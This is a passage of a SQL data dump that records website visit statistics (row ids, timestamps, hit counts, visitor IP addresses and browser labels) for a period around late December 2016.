96.178.71','chrome'),(80735,1483000380,1,1,0,0,'40.77.167.75','other'),(80736,1483000817,1,1,0,0,'66.249.69.152','chrome'),(80737,1483000926,1,1,0,0,'66.249.75.183','chrome'),(80738,1483001611,1,1,0,0,'157.55.39.150','other'),(80739,1483002090,1,1,0,0,'91.196.177.26','chrome'),(80740,1483002306,1,1,0,0,'91.196.178.70','firefox'),(80741,1483003529,1,1,0,0,'91.196.178.35','chrome'),(80742,1483003568,1,1,0,0,'91.196.178.70','firefox'),(80743,1483003571,1,0,1,0,'66.249.75.187',''),(80744,1483003923,1,1,0,0,'178.214.193.202','chrome'),(80745,1483004288,1,0,1,0,'66.249.69.152',''),(80746,1483004599,1,1,0,0,'91.196.178.66','chrome'),(80747,1483004810,1,1,0,0,'78.111.190.89','chrome'),(80748,1483005004,1,1,0,0,'91.196.178.65','firefox'),(80749,1483005053,1,1,0,0,'66.249.75.187','chrome'),(80750,1483005386,1,1,0,0,'91.121.101.78','other'),(80751,1483005566,1,1,0,0,'91.196.178.70','firefox'),(80752,1483005862,1,1,0,0,'91.196.178.167','chrome'),(80753,1483006313,1,1,0,0,'91.196.178.66','chrome'),(80754,1483007134,1,1,0,0,'66.102.9.29','other'),(80755,1483008143,1,1,0,0,'66.249.75.187','chrome'),(80756,1483008183,1,1,0,0,'66.249.69.155','chrome'),(80757,1483008652,1,1,0,0,'78.111.190.89','chrome'),(80758,1483008691,2,2,0,0,'141.8.183.25','other'),(80759,1483008885,2,2,0,0,'91.196.178.66','chrome'),(80760,1483008989,2,2,0,0,'91.217.66.22','chrome'),(80761,1483009719,1,1,0,0,'91.196.178.68','firefox'),(80762,1483009995,1,1,0,0,'91.196.178.66','chrome'),(80763,1483010123,1,1,0,0,'130.193.50.34','other'),(80764,1483010583,1,0,1,0,'66.249.69.155',''),(80765,1483010700,1,0,1,0,'66.249.75.183',''),(80766,1483012564,2,0,2,0,'66.249.75.183',''),(80767,1483012648,1,1,0,0,'91.196.178.67','firefox'),(80768,1483012649,2,2,0,0,'91.196.178.70','firefox'),(80769,1483012882,1,1,0,0,'40.77.167.25','other'),(80770,1483013705,1,0,1,0,'66.249.75.187',''),(80771,1483013951,1,1,0,0,'91.196.177.46','firefox'),(80772,1483014240,1,0,1,0,'66.249.75.183',''),(80773,1483014950,1,1,0,0,'180.76.15.28','other'),(80774,1483015365,1,1,0,0,'66.249.75.183','chrome'),(80775,1483015386,1,1,0,0,'66.249.69.152','chrome'),(80776,1483015767,1,0,1,0,'68.180.228.38',''),(80777,1483015868,1,1,0,0,'91.196.178.162','chrome'),(80778,1483016369,1,0,1,0,'66.249.75.179',''),(80779,1483016552,1,0,1,0,'66.249.75.187',''),(80780,1483016624,1,1,0,0,'92.113.191.253','chrome'),(80781,1483016636,1,1,0,0,'46.219.247.132','firefox'),(80782,1483017136,1,1,0,0,'40.77.167.25','other'),(80783,1483018555,1,1,0,0,'40.77.167.75','other'),(80784,1483019860,2,0,2,0,'68.180.228.38',''),(80785,1483020646,1,1,0,0,'194.187.248.10','other'),(80786,1483021088,1,0,1,0,'66.249.75.187',''),(80787,1483021517,1,1,0,0,'66.102.9.25','other'),(80788,1483021986,1,0,1,0,'66.249.75.179',''),(80789,1483022149,1,1,0,0,'40.77.167.25','other'),(80790,1483022236,1,1,0,0,'141.8.183.25','other'),(80791,1483022654,1,1,0,0,'66.249.75.187','chrome'),(80792,1483022663,1,1,0,0,'66.249.69.152','chrome'),(80793,1483023756,1,0,1,0,'66.249.75.183',''),(80794,1483024221,1,0,1,0,'66.249.69.155',''),(80795,1483025611,1,1,0,0,'40.77.167.25','other'),(80796,1483025898,1,1,0,0,'180.76.15.9','other'),(80797,1483026522,1,1,0,0,'141.8.183.25','other'),(80798,1483026799,2,1,1,0,'66.249.75.183',''),(80799,1483026956,1,1,0,0,'157.55.39.150','other'),(80800,1483028097,1,1,0,0,'66.102.9.25','chrome'),(80801,1483029688,2,0,2,0,'66.249.75.179',''),(80802,1483030265,1,1,0,0,'40.77.167.25','other'),(80803,1483030275,1,1,0,0,'52.86.176.3','other'),(80804,1483030942,4,2,2,0,'66.249.75.183',''),(80805,1483030945,1,1,0,0,'66.249.69.149','chrome'),(80806,1483031010,3,1,2,0,'66.249.75.179',''),(80807,1483031044,2,0,2,0,'66.249.75.187',''),(80808,1483032091,1,1,0,0,'163.172.64.185','other'),(80809,1483032700,1,0,1,0,'66.249.75.187',''),(80810,1483034290,1,0,1,0,'68.180.228.38',''),(80811,1483034762,1,0,1,0,'66.249.75.183',''),(80812,1483035950,1,1,0,0,'66.102.9.29','other'),(80813,1483036053,1,0,1,0,'68.180.228.38',''),(80814,1483036914,1,1,0,0,'40.77.167.25','other'),(80815,1483038044,1,1,0,0,'40.77.167.75','other'),(80816,1483038062,1,1,0,0,'78.111.190.89','chrome'),(80817,1483038092,1,0,1,0,'66.249.75.187',''),(80818,1483038461,1,0,1,0,'66.249.75.179',''),(80819,1483038844,1,1,0,0,'66.249.69.149','chrome'),(80820,1483038846,1,1,0,0,'66.249.75.179','chrome'),(80821,1483039369,1,0,1,0,'66.249.75.187',''),(80822,1483039450,1,1,0,0,'40.77.167.25','other'),(80823,1483039936,2,2,0,0,'91.196.178.164','chrome'),(80824,1483040425,1,0,1,0,'66.249.75.187',''),(80825,1483040555,1,0,1,0,'66.249.69.152',''),(80826,1483041200,1,1,0,0,'94.179.8.166','firefox'),(80827,1483041311,1,0,1,0,'66.249.75.183',''),(80828,1483041317,1,1,0,0,'40.77.167.25','other'),(80829,1483043044,1,1,0,0,'40.77.167.25','other'),(80830,1483043058,1,1,0,0,'40.77.167.75','other'),(80831,1483043469,1,1,0,0,'130.193.51.19','other'),(80832,1483044250,1,0,1,0,'66.249.75.179',''),(80833,1483045417,1,0,1,0,'66.249.69.149',''),(80834,1483046130,1,0,1,0,'66.249.75.187',''),(80835,1483046487,1,1,0,0,'46.211.1.208','other'),(80836,1483047086,2,0,2,0,'66.249.75.187',''),(80837,1483047126,2,2,0,0,'52.86.176.3','other'),(80838,1483047816,1,1,0,0,'157.55.39.150','other'),(80839,1483047831,1,0,1,0,'66.249.75.183',''),(80840,1483049261,1,0,1,0,'66.249.75.187',''),(80841,1483050298,1,1,0,0,'66.102.9.29','other'),(80842,1483050847,1,1,0,0,'163.172.64.242','other'),(80843,1483053223,1,0,1,0,'66.249.75.179',''),(80844,1483055054,2,1,1,0,'66.249.75.183',''),(80845,1483056181,1,0,1,0,'66.249.69.152',''),(80846,1483057618,1,1,0,0,'40.77.167.25','other'),(80847,1483060921,2,1,1,0,'66.249.69.152',''),(80848,1483061271,1,1,0,0,'40.77.167.75','other'),(80849,1483064722,1,1,0,0,'66.249.75.183','chrome'),(80850,1483065544,1,0,1,0,'68.180.228.38',''),(80851,1483065655,1,1,0,0,'66.102.9.25','other'),(80852,1483066202,1,1,0,0,'180.76.15.142','other'),(80853,1483066574,1,1,0,0,'66.249.75.187','chrome'),(80854,1483066667,1,1,0,0,'66.249.75.183','chrome'),(80855,1483067781,1,1,0,0,'66.249.75.187','chrome'),(80856,1483068070,1,1,0,0,'66.249.75.179','chrome'),(80857,1483068199,1,1,0,0,'163.172.64.224','other'),(80858,1483071738,1,1,0,0,'163.172.64.232','other'),(80859,1483074390,1,0,1,0,'66.249.75.179',''),(80860,1483075741,1,1,0,0,'141.8.183.25','other'),(80861,1483075984,1,1,0,0,'163.172.64.243','other'),(80862,1483076620,1,1,0,0,'66.249.75.187','chrome'),(80863,1483077538,1,1,0,0,'66.249.69.149','chrome'),(80864,1483077910,1,1,0,0,'91.196.178.69','firefox'),(80865,1483079176,1,1,0,0,'95.134.15.237','chrome'),(80866,1483079315,1,1,0,0,'66.102.9.25','other'),(80867,1483079317,1,1,0,0,'163.172.64.232','other'),(80868,1483079471,1,1,0,0,'91.196.178.70','firefox'),(80869,1483079503,1,0,1,0,'66.249.75.179',''),(80870,1483081580,1,1,0,0,'82.145.223.56','opera'),(80871,1483081948,1,1,0,0,'91.196.178.167','chrome'),(80872,1483082269,1,1,0,0,'46.173.168.72','firefox'),(80873,1483082573,1,1,0,0,'91.196.178.136','firefox'),(80874,1483083009,1,1,0,0,'91.196.178.70','firefox'),(80875,1483083648,1,1,0,0,'46.173.168.72','firefox'),(80876,1483084700,1,1,0,0,'66.249.75.187','chrome'),(80877,1483085218,1,1,0,0,'157.55.39.196','other'),(80878,1483085986,1,1,0,0,'95.135.88.73','firefox'),(80879,1483087019,1,1,0,0,'66.249.69.152','chrome'),(80880,1483087267,300,300,0,0,'5.9.73.227','other'),(80881,1483088302,1,1,0,0,'91.196.178.67','other'),(80882,1483088341,1,1,0,0,'91.196.178.135','chrome'),(80883,1483089236,1,1,0,0,'91.196.178.131','chrome'),(80884,1483089291,1,1,0,0,'95.135.88.73','firefox'),(80885,1483089577,1,1,0,0,'92.112.58.219','firefox'),(80886,1483089735,1,1,0,0,'94.179.87.103','firefox'),(80887,1483090743,1,1,0,0,'52.86.176.3','other'),(80888,1483090809,1,1,0,0,'157.55.39.196','other'),(80889,1483094031,1,1,0,0,'37.54.18.5','firefox'),(80890,1483094080,1,1,0,0,'66.102.9.29','other'),(80891,1483097274,1,1,0,0,'163.172.64.254','other'),(80892,1483098199,1,1,0,0,'66.249.75.187','chrome'),(80893,1483099672,1,1,0,0,'66.249.69.152','chrome'),(80894,1483099923,1,1,0,0,'157.55.39.197','other'),(80895,1483100204,1,1,0,0,'91.196.178.37','chrome'),(80896,1483100962,1,0,1,0,'66.249.75.179',''),(80897,1483101085,1,1,0,0,'66.249.93.156','chrome'),(80898,1483101096,1,1,0,0,'130.180.218.77','chrome'),(80899,1483101734,1,1,0,0,'207.46.13.59','other'),(80900,1483103197,1,1,0,0,'157.55.39.197','other'),(80901,1483104376,1,1,0,0,'130.180.218.77','chrome'),(80902,1483104525,1,1,0,0,'163.172.64.231','other'),(80903,1483104961,1,1,0,0,'66.249.75.179','chrome'),(80904,1483105343,1,1,0,0,'52.86.176.3','other'),(80905,1483108152,1,1,0,0,'66.102.9.29','other'),(80906,1483108490,1,1,0,0,'163.172.64.177','other'),(80907,1483109563,1,1,0,0,'163.172.64.179','other'),(80908,1483110057,1,1,0,0,'52.86.176.3','other'),(80909,1483110266,1,1,0,0,'91.196.178.65','firefox'),(80910,1483110587,1,1,0,0,'130.180.218.77','chrome'),(80911,1483111420,1,1,0,0,'63.243.252.14','other'),(80912,1483111930,1,0,1,0,'66.249.75.187',''),(80913,1483112515,1,1,0,0,'66.249.69.149','chrome'),(80914,1483112862,1,1,0,0,'130.180.218.77','chrome'),(80915,1483113122,1,0,1,0,'66.249.75.179',''),(80916,1483113302,1,1,0,0,'188.244.45.43','msie'),(80917,1483113986,1,1,0,0,'157.55.39.197','other'),(80918,1483114476,1,1,0,0,'91.196.178.40','firefox'),(80919,1483115674,1,1,0,0,'52.86.176.3','other'),(80920,1483115767,1,1,0,0,'207.46.13.59','other'),(80921,1483116379,1,1,0,0,'130.180.218.77','chrome'),(80922,1483116576,1,1,0,0,'180.76.15.138','other'),(80923,1483118230,1,1,0,0,'163.172.64.178','other'),(80924,1483118327,1,1,0,0,'94.180.136.198','msie'),(80925,1483118868,50,50,0,0,'91.198.143.117','other'),(80926,1483118897,1,1,0,0,'130.180.218.77','chrome'),(80927,1483119015,1,0,1,0,'66.249.75.183',''),(80928,1483119574,1,0,1,0,'66.249.75.179',''),(80929,1483119816,1,1,0,0,'163.172.64.187','other'),(80930,1483120157,1,1,0,0,'128.69.234.2','msie'),(80931,1483120785,2,0,2,0,'66.249.75.179',''),(80932,1483120940,1,1,0,0,'89.178.92.49','msie'),(80933,1483121465,1,1,0,0,'207.46.13.59','other'),(80934,1483122630,1,1,0,0,'66.102.9.25','other'),(80935,1483122684,1,1,0,0,'46.211.146.62','chrome'),(80936,1483123719,1,0,1,0,'66.249.75.183',''),(80937,1483123925,1,1,0,0,'163.172.64.232','other'),(80938,1483124749,1,1,0,0,'163.172.64.225','other'),(80939,1483125233,1,1,0,0,'163.172.64.187','other'),(80940,1483126761,1,0,1,0,'66.249.69.155',''),(80941,1483129208,2,0,2,0,'66.249.75.187',''),(80942,1483129238,17,0,17,0,'66.249.75.179',''),(80943,1483129315,3,0,3,0,'66.249.75.183',''),(80944,1483129476,1,0,1,0,'66.249.69.149',''),(80945,1483129631,1,0,1,0,'66.249.69.155',''),(80946,1483130019,1,1,0,0,'141.0.12.10','other'),(80947,1483131828,5,1,4,0,'66.249.75.187',''),(80948,1483132136,2,0,2,0,'66.249.75.183',''),(80949,1483132172,1,0,1,0,'66.249.75.179',''),(80950,1483132340,1,1,0,0,'207.46.13.181','other'),(80951,1483134056,1,0,1,0,'66.249.75.187',''),(80952,1483135053,1,0,1,0,'66.249.75.187',''),(80953,1483135679,1,0,1,0,'66.249.69.149',''),(80954,1483135825,1,0,1,0,'66.249.75.179',''),(80955,1483136201,1,1,0,0,'157.55.39.197','other'),(80956,1483136286,1,1,0,0,'82.145.220.103','chrome'),(80957,1483136761,1,0,1,0,'66.249.75.187',''),(80958,1483137060,1,1,0,0,'66.102.9.25','other'),(80959,1483138923,1,0,1,0,'66.249.75.187',''),(80960,1483139203,1,0,1,0,'66.249.75.179',''),(80961,1483140807,1,1,0,0,'157.55.39.197','other'),(80962,1483141470,1,1,0,0,'207.46.13.181','other'),(80963,1483143886,1,0,1,0,'66.249.75.183',''),(80964,1483144655,1,0,1,0,'66.249.75.187',''),(80965,1483145191,1,0,1,0,'66.249.75.179',''),(80966,1483145987,1,1,0,0,'180.76.15.24','other'),(80967,1483146566,1,0,1,0,'66.249.75.183',''),(80968,1483146773,1,0,1,0,'66.249.75.179',''),(80969,1483146876,3,3,0,0,'66.249.75.179','chrome'),(80970,1483147166,1,1,0,0,'163.172.64.237','other'),(80971,1483147345,1,1,0,0,'163.172.64.192','other'),(80972,1483147923,1,0,1,0,'66.249.75.187',''),(80973,1483147976,1,0,1,0,'66.249.75.183',''),(80974,1483149601,2,0,2,0,'66.249.75.179',''),(80975,1483149604,1,0,1,0,'66.249.69.152',''),(80976,1483151759,1,0,1,0,'66.249.75.183',''),(80977,1483151983,1,1,0,0,'66.102.9.27','other'),(80978,1483152292,1,1,0,0,'66.249.69.149','chrome'),(80979,1483153029,1,1,0,0,'217.69.133.29','other'),(80980,1483155484,1,1,0,0,'46.42.172.44','chrome'),(80981,1483163995,1,0,1,0,'66.249.75.183',''),(80982,1483164551,1,1,0,0,'217.69.133.30','other'),(80983,1483165632,1,1,0,0,'66.102.9.27','other'),(80984,1483166087,1,1,0,0,'77.41.25.174','chrome'),(80985,1483166278,2,2,0,0,'95.213.141.126','opera'),(80986,1483166497,2,0,2,0,'66.249.75.183',''),(80987,1483169152,1,1,0,0,'66.102.9.25','chrome'),(80988,1483169627,1,1,0,0,'157.55.39.197','other'),(80989,1483169742,1,0,1,0,'66.249.75.179',''),(80990,1483170169,1,1,0,0,'93.80.145.208','chrome'),(80991,1483170604,1,1,0,0,'163.172.64.222','other'),(80992,1483171962,1,1,0,0,'109.63.206.8','chrome'),(80993,1483172647,1,1,0,0,'37.54.18.5','firefox'),(80994,1483172907,1,1,0,0,'95.221.228.179','msie'),(80995,1483173054,1,0,1,0,'66.249.75.183',''),(80996,1483173074,1,0,1,0,'66.249.75.187',''),(80997,1483173166,1,1,0,0,'176.195.96.139','firefox'),(80998,1483173509,1,1,0,0,'66.249.75.183','chrome'),(80999,1483174581,1,1,0,0,'91.196.178.70','chrome'),(81000,1483174594,1,1,0,0,'130.193.51.19','other'),(81001,1483174721,1,0,1,0,'66.249.69.149',''),(81002,1483177487,1,0,1,0,'66.249.69.155',''),(81003,1483178046,1,1,0,0,'207.46.13.181','other'),(81004,1483178325,1,0,1,0,'66.249.75.187',''),(81005,1483178967,1,1,0,0,'91.196.178.40','chrome'),(81006,1483179276,1,0,1,0,'66.249.75.183',''),(81007,1483180037,1,1,0,0,'66.102.9.25','other'),(81008,1483180260,1,0,1,0,'66.249.69.152',''),(81009,1483180577,1,1,0,0,'130.193.50.34','other'),(81010,1483181223,1,1,0,0,'66.249.69.152','chrome'),(81011,1483181403,1,0,1,0,'66.249.75.187',''),(81012,1483182161,1,1,0,0,'128.69.215.2','other'),(81013,1483185415,1,0,1,0,'66.249.75.187',''),(81014,1483186680,1,0,1,0,'66.249.75.187',''),(81015,1483186719,2,0,2,0,'66.249.75.183',''),(81016,1483187202,1,1,0,0,'91.196.178.40','chrome'),(81017,1483187213,1,1,0,0,'141.8.183.19','other'),(81018,1483188208,1,0,1,0,'66.249.75.179',''),(81019,1483189697,2,0,2,0,'66.249.75.179',''),(81020,1483190426,1,1,0,0,'37.54.18.5','firefox'),(81021,1483190701,1,0,1,0,'66.249.75.183',''),(81022,1483191377,1,1,0,0,'37.54.18.5','firefox'),(81023,1483191646,1,0,1,0,'66.249.75.179',''),(81024,1483192716,1,1,0,0,'37.54.18.5','firefox'),(81025,1483193335,1,1,0,0,'163.172.64.251','other'),(81026,1483194534,1,1,0,0,'66.102.9.27','other'),(81027,1483194970,1,1,0,0,'207.46.13.181','other'),(81028,1483195205,1,1,0,0,'69.30.213.82','other'),(81029,1483195505,1,1,0,0,'178.255.215.94','other'),(81030,1483196286,1,1,0,0,'141.8.183.25','other'),(81031,1483196288,1,0,1,0,'66.249.75.179',''),(81032,1483196408,1,0,1,0,'66.249.69.152',''),(81033,1483196711,1,1,0,0,'130.180.220.107','chrome'),(81034,1483198415,2,0,2,0,'66.249.75.179',''),(81035,1483200681,1,0,1,0,'66.249.75.187',''),(81036,1483200795,1,1,0,0,'37.54.18.5','firefox'),(81037,1483200928,1,0,1,0,'66.249.75.183',''),(81038,1483201846,2,0,2,0,'66.249.75.179',''),(81039,1483201855,1,1,0,0,'91.196.178.36','chrome'),(81040,1483202076,1,1,0,0,'217.69.133.10','other'),(81041,1483202635,1,1,0,0,'207.46.13.181','other'),(81042,1483204062,1,1,0,0,'157.55.39.197','other'),(81043,1483204117,2,0,2,0,'66.249.75.183',''),(81044,1483205074,1,0,1,0,'66.249.75.179',''),(81045,1483205213,1,0,1,0,'66.249.75.183',''),(81046,1483206046,1,1,0,0,'207.46.13.181','other'),(81047,1483206991,1,1,0,0,'91.196.178.165','chrome'),(81048,1483207004,1,1,0,0,'141.8.183.25','other'),(81049,1483207989,1,1,0,0,'66.249.69.149','chrome'),(81050,1483208120,1,1,0,0,'217.69.133.215','other'),(81051,1483208413,2,0,2,0,'66.249.75.183',''),(81052,1483208948,1,1,0,0,'66.102.9.29','other'),(81053,1483209065,1,1,0,0,'95.132.135.143','chrome'),(81054,1483209915,1,0,1,0,'66.249.75.183',''),(81055,1483210354,1,1,0,0,'141.8.142.58','other'),(81056,1483211108,1,1,0,0,'157.55.39.197','other'),(81057,1483211525,2,0,2,0,'66.249.75.187',''),(81058,1483211634,2,0,2,0,'66.249.75.183',''),(81059,1483212024,1,0,1,0,'66.249.69.155',''),(81060,1483212799,1,1,0,0,'157.55.39.236','other'),(81061,1483212979,1,0,1,0,'66.249.75.179',''),(81062,1483213890,1,1,0,0,'180.76.15.22','other'),(81063,1483214458,1,0,1,0,'66.249.75.179',''),(81064,1483217082,1,1,0,0,'163.172.64.247','other'),(81065,1483217159,1,1,0,0,'180.76.15.17','other'),(81066,1483217161,1,1,0,0,'91.196.178.68','chrome'),(81067,1483217205,1,1,0,0,'66.102.9.27','chrome'),(81068,1483217347,1,1,0,0,'37.53.224.59','chrome'),(81069,1483221177,1,1,0,0,'180.76.15.153','other'),(81070,1483222408,1,1,0,0,'163.172.64.187','other'),(81071,1483223450,1,1,0,0,'66.102.9.25','other'),(81072,1483225591,1,1,0,0,'163.172.64.226','other'),(81073,1483226307,9,9,0,0,'46.4.32.75','other'),(81074,1483226743,1,1,0,0,'217.69.133.253','other'),(81075,1483226967,1,1,0,0,'95.132.134.45','chrome'),(81076,1483226977,1,1,0,0,'91.196.178.162','chrome'),(81077,1483226981,1,1,0,0,'130.193.50.34','other'),(81078,1483227075,1,1,0,0,'82.145.222.56','other'),(81079,1483229026,1,0,1,0,'66.249.75.179',''),(81080,1483229558,2,0,2,0,'66.249.75.187',''),(81081,1483231219,1,1,0,0,'163.172.64.220','other'),(81082,1483231825,1,0,1,0,'66.249.75.183',''),(81083,1483232925,1,1,0,0,'157.55.39.236','other'),(81084,1483234134,1,0,1,0,'66.249.75.183',''),(81085,1483236391,1,1,0,0,'66.249.75.183','chrome'),(81086,1483238613,1,0,1,0,'66.249.69.149',''),(81087,1483239101,1,1,0,0,'163.172.64.246','other'),(81088,1483243284,1,0,1,0,'66.249.75.179',''),(81089,1483243733,1,0,1,0,'66.249.75.183',''),(81090,1483244641,1,1,0,0,'207.46.13.182','other'),(81091,1483244703,1,1,0,0,'217.69.136.206','other'),(81092,1483248226,1,1,0,0,'157.55.39.236','other'),(81093,1483248321,1,1,0,0,'163.172.64.249','other'),(81094,1483249755,1,1,0,0,'163.172.64.252','other'),(81095,1483249886,1,0,1,0,'66.249.69.149',''),(81096,1483250089,1,1,0,0,'163.172.64.253','other'),(81097,1483250154,1,0,1,0,'66.249.75.179',''),(81098,1483251075,1,1,0,0,'207.46.13.0','other'),(81099,1483251439,1,1,0,0,'5.3.156.129','msie'),(81100,1483251533,1,0,1,0,'66.249.75.179',''),(81101,1483252022,1,1,0,0,'66.249.75.183','chrome'),(81102,1483252167,1,1,0,0,'66.102.9.29','other'),(81103,1483254357,1,1,0,0,'77.52.187.128','chrome'),(81104,1483254369,1,1,0,0,'130.193.50.34','other'),(81105,1483256191,1,0,1,0,'66.249.75.187',''),(81106,1483256485,1,0,1,0,'66.249.69.152',''),(81107,1483257060,1,1,0,0,'46.211.1.201','other'),(81108,1483257484,1,1,0,0,'163.172.64.222','other'),(81109,1483260266,1,1,0,0,'37.54.18.5','firefox'),(81110,1483260287,1,0,1,0,'66.249.75.179',''),(81111,1483260899,300,300,0,0,'62.210.148.246','other'),(81112,1483261144,1,0,1,0,'66.249.75.187',''),(81113,1483261226,1,0,1,0,'66.249.75.183',''),(81114,1483262315,1,1,0,0,'157.55.39.238','other'),(81115,1483262773,1,1,0,0,'130.193.50.34','other'),(81116,1483265648,1,0,1,0,'66.249.69.152',''),(81117,1483265654,1,1,0,0,'163.172.64.241','other'),(81118,1483266141,1,1,0,0,'163.172.64.245','other'),(81119,1483266500,1,1,0,0,'178.255.215.94','other'),(81120,1483266549,1,1,0,0,'66.102.9.27','other'),(81121,1483266709,1,1,0,0,'163.172.64.254','other'),(81122,1483266775,1,1,0,0,'141.8.183.25','other'),(81123,1483267467,1,1,0,0,'188.230.104.190','other'),(81124,1483267561,1,0,1,0,'66.249.75.187',''),(81125,1483267686,1,0,1,0,'66.249.69.155',''),(81126,1483268127,1,1,0,0,'130.193.50.34','other'),(81127,1483268556,1,0,1,0,'66.249.75.187',''),(81128,1483269149,1,1,0,0,'66.249.75.183','chrome'),(81129,1483270734,1,1,0,0,'95.221.204.191','msie'),(81130,1483271473,1,1,0,0,'66.249.93.155','chrome'),(81131,1483271928,1,0,1,0,'66.249.75.187',''),(81132,1483272802,1,1,0,0,'163.172.64.217','other'),(81133,1483273202,1,1,0,0,'163.172.64.188','other'),(81134,1483274201,2,0,2,0,'66.249.75.187',''),(81135,1483274698,1,1,0,0,'163.172.64.252','other'),(81136,1483275727,1,1,0,0,'46.211.124.66','other'),(81137,1483276130,23,23,0,0,'5.9.88.103','other'),(81138,1483277326,1,0,1,0,'66.249.75.187',''),(81139,1483277346,1,1,0,0,'37.54.18.5','firefox'),(81140,1483277802,1,1,0,0,'217.69.133.248','other'),(81141,1483278507,1,0,1,0,'66.249.75.179',''),(81142,1483278687,1,0,1,0,'66.249.75.187',''),(81143,1483278778,1,1,0,0,'163.172.64.224','other'),(81144,1483279122,1,1,0,0,'46.219.245.62','chrome'),(81145,1483279711,1,0,1,0,'66.249.75.179',''),(81146,1483279894,1,1,0,0,'157.55.39.238','other'),(81147,1483280241,2,0,2,0,'66.249.75.187',''),(81148,1483280877,1,0,1,0,'66.249.75.183',''),(81149,1483281322,1,1,0,0,'66.102.9.27','other'),(81150,1483283376,1,0,1,0,'66.249.75.179',''),(81151,1483284392,1,0,1,0,'66.249.75.183',''),(81152,1483284897,1,0,1,0,'66.249.69.149',''),(81153,1483285535,1,1,0,0,'180.76.15.144','other'),(81154,1483285545,1,1,0,0,'157.55.39.238','other'),(81155,1483286275,1,1,0,0,'163.172.64.220','other'),(81156,1483286973,2,2,0,0,'157.55.39.236','other'),(81157,1483287733,1,1,0,0,'180.76.15.155','other'),(81158,1483288057,1,0,1,0,'66.249.75.179',''),(81159,1483288230,1,0,1,0,'66.249.75.187',''),(81160,1483289398,1,1,0,0,'46.211.125.223','other'),(81161,1483289554,1,1,0,0,'63.243.252.93','other'),(81162,1483290002,1,1,0,0,'163.172.64.229','other'),(81163,1483290677,2,0,2,0,'66.249.75.179',''),(81164,1483290702,2,0,2,0,'66.249.75.183',''),(81165,1483291563,1,1,0,0,'180.76.15.159','other'),(81166,1483291936,2,2,0,0,'46.211.125.223','other'),(81167,1483292230,1,1,0,0,'163.172.64.223','other'),(81168,1483292910,1,1,0,0,'130.180.219.12','chrome'),(81169,1483295132,1,1,0,0,'46.211.146.72','chrome'),(81170,1483295351,1,1,0,0,'66.102.9.29','other'),(81171,1483296303,1,1,0,0,'95.132.135.15','chrome'),(81172,1483296474,1,1,0,0,'46.211.124.99','other'),(81173,1483298212,2,1,1,0,'66.249.69.152',''),(81174,1483298888,1,1,0,0,'66.249.75.179','chrome'),(81175,1483299395,2,0,2,0,'66.249.75.183',''),(81176,1483299947,1,1,0,0,'37.52.247.100','opera'),(81177,1483301127,1,1,0,0,'46.219.243.32','opera'),(81178,1483302614,1,1,0,0,'163.172.64.186','other'),(81179,1483304427,1,1,0,0,'217.69.133.232','other'),(81180,1483304581,5,5,0,0,'46.4.116.197','other'),(81181,1483305021,1,1,0,0,'66.102.9.27','other'),(81182,1483305586,1,1,0,0,'37.187.129.166','chrome'),(81183,1483305891,1,1,0,0,'157.55.39.238','other'),(81184,1483306325,1,1,0,0,'207.46.13.182','other'),(81185,1483307842,1,0,1,0,'66.249.75.179',''),(81186,1483308842,1,1,0,0,'46.119.114.161','other'),(81187,1483309027,1,0,1,0,'66.249.75.183',''),(81188,1483309091,1,0,1,0,'66.249.75.179',''),(81189,1483309815,1,0,1,0,'66.249.75.187',''),(81190,1483310004,1,1,0,0,'217.69.133.246','other'),(81191,1483311144,2,0,2,0,'66.249.75.187',''),(81192,1483311639,1,0,1,0,'66.249.75.179',''),(81193,1483311826,2,0,2,0,'66.249.75.183',''),(81194,1483314456,1,0,1,0,'66.249.75.179',''),(81195,1483317834,1,0,1,0,'66.249.75.183',''),(81196,1483318288,1,0,1,0,'66.249.75.179',''),(81197,1483319440,1,0,1,0,'66.249.75.183',''),(81198,1483319575,1,1,0,0,'66.249.69.155','chrome'),(81199,1483319943,1,1,0,0,'66.102.9.27','other'),(81200,1483321634,1,0,1,0,'66.249.75.179',''),(81201,1483321897,1,1,0,0,'157.55.39.236','other'),(81202,1483322716,1,1,0,0,'141.0.13.86','other'),(81203,1483324288,1,1,0,0,'40.77.167.6','other'),(81204,1483324424,1,0,1,0,'66.249.75.183',''),(81205,1483324996,1,0,1,0,'66.249.75.187',''),(81206,1483328047,1,0,1,0,'66.249.75.187',''),(81207,1483328061,1,0,1,0,'66.249.75.183',''),(81208,1483328206,1,1,0,0,'40.77.167.6','other'),(81209,1483329348,1,1,0,0,'207.46.13.182','other'),(81210,1483332261,2,0,2,0,'66.249.75.183',''),(81211,1483332395,2,0,2,0,'66.249.75.179',''),(81212,1483333860,2,0,2,0,'66.249.75.187',''),(81213,1483333876,1,1,0,0,'66.102.9.27','other'),(81214,1483334111,1,0,1,0,'68.180.228.38',''),(81215,1483336309,1,1,0,0,'157.55.39.78','other'),(81216,1483338595,2,0,2,0,'66.249.75.183',''),(81217,1483339603,1,1,0,0,'66.102.9.25','chrome'),(81218,1483339744,1,0,1,0,'66.249.75.183',''),(81219,1483340385,1,0,1,0,'66.249.75.179',''),(81220,1483340638,1,0,1,0,'66.249.75.187',''),(81221,1483341385,1,1,0,0,'194.135.16.176','chrome'),(81222,1483341399,1,1,0,0,'5.255.253.67','other'),(81223,1483342251,1,0,1,0,'66.249.75.183',''),(81224,1483344410,1,0,1,0,'66.249.75.183',''),(81225,1483344920,1,0,1,0,'66.249.69.155',''),(81226,1483345020,1,1,0,0,'40.77.167.6','other'),(81227,1483348171,1,1,0,0,'66.249.75.179','chrome'),(81228,1483348980,1,1,0,0,'178.92.85.89','chrome'),(81229,1483349270,1,1,0,0,'180.76.15.25','other'),(81230,1483351458,2,0,2,0,'66.249.75.187',''),(81231,1483351503,1,0,1,0,'66.249.69.155',''),(81232,1483353780,1,1,0,0,'163.172.64.237','other'),(81233,1483354228,1,1,0,0,'207.46.13.182','other'),(81234,1483354500,1,0,1,0,'66.249.75.187',''),(81235,1483355397,1,1,0,0,'163.172.64.254','other'),(81236,1483355439,2,0,2,0,'66.249.75.183',''),(81237,1483357654,1,1,0,0,'217.69.133.233','other'),(81238,1483359376,1,1,0,0,'91.196.178.68','other'),(81239,1483360269,1,1,0,0,'94.179.208.149','chrome'),(81240,1483360283,1,1,0,0,'130.193.50.34','other'),(81241,1483360600,1,1,0,0,'91.196.178.38','other'),(81242,1483360975,2,0,2,0,'66.249.75.187',''),(81243,1483361241,1,1,0,0,'157.55.39.78','other'),(81244,1483362813,1,1,0,0,'66.102.9.25','other'),(81245,1483363051,1,0,1,0,'66.249.75.187',''),(81246,1483363123,1,0,1,0,'66.249.75.183',''),(81247,1483364859,1,1,0,0,'163.172.64.254','other'),(81248,1483366082,1,1,0,0,'163.172.64.185','other'),(812